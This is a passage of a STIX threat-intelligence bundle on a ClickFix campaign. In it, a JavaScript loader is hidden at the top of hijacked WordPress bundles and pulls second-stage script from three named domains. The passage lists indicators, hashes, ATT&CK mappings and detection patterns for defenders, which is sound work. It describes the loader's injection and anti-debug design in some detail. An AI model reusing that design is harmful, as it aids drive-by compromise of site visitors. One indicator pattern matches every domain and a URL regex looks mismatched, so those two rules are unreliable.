      "target_ref": "attack-pattern--008a4ad5-b0f1-4180-a7e3-9d3a58c0c143"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f46cc453-0525-47ad-86f8-eff7d9a9837c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--6a49e18b-18d1-4720-ba93-eced5079b060"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--245b9046-96a0-434c-a2ea-36824a18d3a6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--b779f195-2015-4fc3-8419-68353cb9518c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2484a1f-cc8f-4e48-bb32-7bb221e84132",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--0d4a453d-722c-43a7-bed1-3521d275cc28"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0a7163c0-c74e-4235-8b57-19fbd4caea92",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--bd64e0b1-836d-4d1d-a305-c98f470840ea"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4628b05-8725-4007-b503-c78cce6a6d5f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--8614fc05-7c49-47c3-9248-4c1d60c5e1be"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--816115cb-72c5-4117-9db0-271238274995",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--79fb3213-1f11-43e1-956c-b8d8e253d0ec"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a768c5d-61d5-4174-a61e-09b99227ec92",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--224b0c8d-55dc-4fc3-b518-1dde14ee8a1e"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0fb79a5f-8253-4a2b-a783-bc7ed23ef80c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--0d0461cf-e98a-4e7b-8aac-5aba97b7b803"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92eac3c0-2eee-4ad1-a21b-10e32e608433",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--b6716550-aae5-42da-b926-70b90e26b397"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "TDS Cluster \u2014 AS202412 / ntdnewtds infrastructure",
      "description": "Threat cluster operating shared TDS infrastructure across ntdnewtds.shop, dnsnewtds.shop, and sdntds.shop. Delivers ClickFix fake-CAPTCHA payloads via WordPress bundle hijacking. Consistent TTPs with SL-ADV-007 variant 1: same deduplication guard (window.__performance_optimizer_v6), same synchronous XHR injection pattern, same setInterval anti-debug timing (4000ms), same Function.constructor sandbox escape probe. This variant (V2) introduces a third TDS domain, a new endpoint path (/teamrepo vs /jsrepo), and a bundle-prepend delivery method that camouflages the loader inside a legitimate WordPress combined-JS asset.",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "AS202412 TDS Actor",
        "SL-ADV-007 cluster"
      ],
      "labels": [
        "clickfix",
        "tds",
        "wordpress-bundle-hijack",
        "infostealer"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--6602b80a-c500-4017-9815-36848af024e0",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "SL-ADV-007-V2: TDS Cluster \u2014 WordPress Bundle Hijack Variant",
      "description": "Second variant of the SL-ADV-007 ClickFix TDS campaign. Loader prepended to legitimate WordPress combined-JS bundle as camouflage. Infrastructure expanded: third TDS domain sdntds.shop added, endpoint path changed from /jsrepo to /teamrepo. Loader deliberately left cleartext (no obfuscation on injection mechanism). Anti-debug section retained with RC4+Base64 obfuscation. Attributed to same cluster as V1 via shared guard, XHR pattern, timing, and domains.",
      "first_seen": "2026-01-01T00:00:00Z",
      "last_seen": "2026-05-19T00:00:00.000Z",
      "labels": [
        "clickfix",
        "bundle-hijack",
        "tds",
        "wordpress",
        "v2"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "TDS Stage-1 JS Loader \u2014 Variant 2 (bundle-prepend, /teamrepo)",
      "description": "Second observed variant of the Stage-1 TDS JS loader from the SL-ADV-007 cluster. Key distinction from Variant 1: the injection mechanism (lines 1-25) is CLEARTEXT \u2014 no obfuscation applied to the loader itself. The malware is prepended to a legitimate WordPress combined-JS bundle (1,131,399 bytes total) containing jQuery Migrate 3.4.1, Avada theme JS, Contact Form 7, imagesLoaded, Waypoints, Swiper, FlexSlider, WooCommerce theme JS, Isotope, InfiniteScroll, and WPBakery Page Builder v6.0.0. This bundle-hijack delivery makes the file appear as a legitimate cached asset to casual inspection and WAF/proxy analysis. The loader checks window.__performance_optimizer_v6 as a deduplication guard, then iterates three base64-encoded TDS endpoints (/teamrepo?rnd=<random>) via synchronous XMLHttpRequest. On HTTP 200: document.createElement('script'), script.text = responseText, document.head.appendChild(script). A separate obfuscated anti-debug section (lines 1071-2185, 758-entry RC4+Base64 string array, rotation 298290, decoder _0xc930) runs setInterval(_0x42fc94, 4000) debugger trap and Function.constructor('return this') sandbox escape probe \u2014 identical structural pattern to Variant 1.",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "bundle-hijack",
        "cleartext-loader",
        "wordpress"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--b05cc05f-8819-4220-9a0d-be63d5a66841",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "abstract": "Variant linkage: SL-ADV-007-V2 attributed to same cluster as SL-ADV-007-V1",
      "content": "Shared indicators confirming common authorship between V1 (god-help-me.js/stuff.js) and V2 (stuff1.js):\n\u2022 window.__performance_optimizer_v6 deduplication guard (identical)\n\u2022 Synchronous XHR GET + createElement('script') + script.text + head.appendChild() (identical)\n\u2022 Math.random() cache-buster appended to URL (identical)\n\u2022 setInterval(debugger_trap, 4000) timing (identical)\n\u2022 Function.constructor('return this') sandbox escape probe (identical)\n\u2022 RC4+Base64 obfuscator.io cipher for anti-debug section (same cipher, smaller array)\n\u2022 _0x490f string array function name (identical)\n\u2022 Shared TDS domains ntdnewtds.shop and dnsnewtds.shop\n\nV2-specific deltas (infrastructure evolution):\n\u2022 Third TDS domain added: sdntds.shop\n\u2022 Endpoint path changed: /jsrepo \u2192 /teamrepo\n\u2022 Main loader changed from fully obfuscated to CLEARTEXT\n\u2022 Delivery method changed: standalone injection \u2192 WordPress bundle prepend\n\u2022 Host bundle: 29,062 lines of legitimate WP plugins used as cover",
      "object_refs": [
        "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
        "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2 (V1+V2)",
      "description": "Shared primary TDS C2 across both variants. V1: /jsrepo path. V2: /teamrepo path.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "ntdnewtds"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2 (V1+V2)",
      "description": "Shared fallback TDS endpoint across both variants.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "dnsnewtds"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "sdntds.shop \u2014 Third TDS C2 (V2 only)",
      "description": "New third TDS endpoint introduced in Variant 2. Not present in Variant 1. Queried at /teamrepo?rnd=<random> after ntdnewtds and dnsnewtds fail.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "new",
        "sdntds",
        "v2-only"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f04509f2-c681-4ab6-b087-2602d8d0f33a",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File: stuff1.js \u2014 Variant 2 bundle-hijack (1,131,399 bytes)",
      "description": "WordPress combined-JS bundle with TDS loader prepended. Contains cleartext injection mechanism + obfuscated anti-debug section + 10 legitimate WordPress plugins as cover.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = '09d8e272484c2bef81590887460981ff' OR file:hashes.'SHA-1' = 'e221c94adb02cc387bcbf9265c1769f36c59cce5' OR file:hashes.'SHA-256' = 'b04f539c7bbb9133d2f801bfce73ec84ad3cc33768685ca415113f622db90168']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "bundle-hijack",
        "stage1",
        "v2",
        "file-hash"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--227c1dc1-f220-4f04-bd9f-56c08678962e",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop (shared V1+V2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eb580302-abc8-46e9-bfe5-b2d4b7d43fe5",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop (shared V1+V2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--555fac76-56df-477f-a55c-655e1848a22e",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: sdntds.shop (V2 only \u2014 NEW)",
      "description": "Third TDS domain not present in Variant 1. Infrastructure expansion indicator.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'sdntds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "v2-only",
        "new-domain",
        "sdntds"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d37a9828-337b-483d-a7c8-6a45c715c4b8",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "URL Pattern: /teamrepo?rnd= endpoint (V2)",
      "description": "V2-specific TDS payload path. V1 used /jsrepo. Cache-busted with Math.random().",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^https?://(ntd|dns|sdn)newtds\\.shop/teamrepo\\?rnd=|sdntds\\.shop/teamrepo\\?rnd=']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "tds",
        "teamrepo",
        "v2",
        "url-pattern"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c65f9f8a-354e-47bf-8843-465baa2ee09f",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "DOM guard: window.__performance_optimizer_v6 (shared V1+V2)",
      "description": "Deduplication/re-execution guard shared across both variants. Confirms common authorship/framework.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[domain-name:value MATCHES '.*']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "dom-guard",
        "shared-ioc",
        "attribution"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5718f75-bc2b-4cb9-a5c6-3f0b98e54142",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Code artifact: perfEndpoints / loadPerformanceScript / performanceXHR / optimizerScript",
      "description": "Cleartext variable names used in the V2 loader. Useful for YARA/string matching on bundles where loader is not obfuscated.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:content MATCHES 'loadPerformanceScript|perfEndpoints|performanceXHR|optimizerScript']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "yara-candidate",
        "string-ioc",
        "cleartext-loader"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9d0cdcaf-5c80-48fe-bb5e-761dc1acea81",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File pattern: malicious loader prepended to WordPress combined-JS bundle",
      "description": "V2 delivery technique: window.__performance_optimizer_v6 guard appearing at byte offset 0 of a combined JS file also containing jQuery Migrate / WPBakery / Avada theme code. Flag any combined-JS asset where first line is not a recognisable library comment.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '^if \\(!window\\.__performance_optimizer']",
      "pattern_type": "stix",
      "valid_from": "2026-05-19T00:00:00.000Z",
      "labels": [
        "detection-heuristic",
        "bundle-hijack",
        "first-byte-check"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--30f20f37-3252-4ba7-a7ec-5801184cc078",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "Cleartext JS TDS loader prepended to WordPress bundle. Synchronous XHR + script injection identical to V1.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--24a98d95-0ecc-42a1-adae-3124fc5af164",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "Anti-debug section uses RC4+Base64 obfuscator.io cipher (758-entry array, rotation 298290, decoder _0xc930). Main loader is deliberately left cleartext in V2 \u2014 partial obfuscation strategy.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--10ec9dcd-f7f1-4e00-aea2-f48b8236eaf4",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1027.010 \u2014 Command Obfuscation",
      "description": "All three TDS endpoint URLs base64-encoded within the cleartext loader array.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e3492bdf-28a4-4651-861c-84b205b1c740",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "setInterval(_0x42fc94, 4000) debugger trap + Function.constructor('return this') sandbox escape. Identical timing and structure to Variant 1.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--008b5d30-4100-44e2-9557-79307c836574",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1195.002 \u2014 Supply Chain Compromise: Compromise Software Supply Chain / Asset Hijack",
      "description": "V2-specific: malicious loader prepended to legitimate WordPress combined-JS asset (jQuery Migrate + Avada + CF7 + WPBakery + 7 other plugins). Bundle hijacking camouflages the loader as part of the site's normal JS delivery.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1195/002",
          "external_id": "T1195.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7f8e5085-ed68-42b9-9056-b395331f9096",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Compromised WordPress cannabis/dispensary site serves hijacked combined-JS to all visitors.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--83552909-7093-498f-bd03-51fa30e434db",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Visitors lured or arriving organically at compromised site. ClickFix CAPTCHA lure delivered by second-stage.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8e3f00c4-508d-403b-a1e6-ef8dbfa69ddf",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Fake Cloudflare CAPTCHA social-engineers user into executing clipboard-placed PowerShell via Win+R.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--20faa53e-ad48-4eb3-86da-f3bffcdc490b",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "Anti-debug section strings decoded at runtime via RC4+Base64. TDS endpoint URLs decoded via atob() at runtime.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2115dee5-998e-44fd-a87f-af914112a548",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1104 \u2014 Multi-Stage Channels",
      "description": "Three-level TDS fallback chain: ntdnewtds.shop \u2192 dnsnewtds.shop \u2192 sdntds.shop (new in V2). Increased resilience vs V1 two-endpoint chain.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1104",
          "external_id": "T1104"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4221a565-d330-4a37-b682-bd8afea876b6",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "TDS infrastructure serves remotely-hosted second-stage payload on demand via /teamrepo endpoint.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38c3f176-b3b8-4cf9-8d60-b159a4cddb1f",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2f8ee09-7395-4e81-b098-135915184564",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17c9a593-2fee-42d9-9081-9d81f9e7035d",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36f566ee-2287-4b3e-abea-55b809be3577",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b",
      "description": "Third TDS domain added in V2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61507db7-5a85-463b-9f03-2121b1e0a775",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "target_ref": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2255b461-22fd-4fa0-aacc-60bede0dbec6",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "target_ref": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d50b4956-a533-4fd5-a69b-558d65c18605",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59",
      "target_ref": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd1ffec0-771c-46ed-9ab6-7cecfd91b620",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--f04509f2-c681-4ab6-b087-2602d8d0f33a",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14510bef-6ad1-4402-9760-ac802a403b96",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--227c1dc1-f220-4f04-bd9f-56c08678962e",
      "target_ref": "infrastructure--8b3501a9-572e-4272-8fe8-a95130c3fc6c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b67b9518-1875-41f3-abed-86178e7bb945",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--eb580302-abc8-46e9-bfe5-b2d4b7d43fe5",
      "target_ref": "infrastructure--b5f8251a-4955-4e3c-8eaf-fc8d3ebbf3ac"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--978d37b1-1c32-4be8-89f0-a875185760f0",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--555fac76-56df-477f-a55c-655e1848a22e",
      "target_ref": "infrastructure--59f7ff27-cf5c-4895-8ebf-6edaf249698b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0f9dc47-dbfe-420e-b6dd-4fdbd755a207",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--d37a9828-337b-483d-a7c8-6a45c715c4b8",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ceee800e-9b48-4bb3-87f0-60eacc825df9",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--c65f9f8a-354e-47bf-8843-465baa2ee09f",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd07bfab-cd90-495c-bed6-785aa1bb9662",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e5718f75-bc2b-4cb9-a5c6-3f0b98e54142",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ed4414b-2116-4a90-b9e7-675e2746fd39",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--9d0cdcaf-5c80-48fe-bb5e-761dc1acea81",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93ea5142-2f6f-42f7-9307-26b1b2bc9d46",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--6602b80a-c500-4017-9815-36848af024e0",
      "target_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fab38401-db8e-4e1f-bd8d-06aa023cf2bc",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--30f20f37-3252-4ba7-a7ec-5801184cc078"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e404a92-489a-41e1-9016-ce864d34990b",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
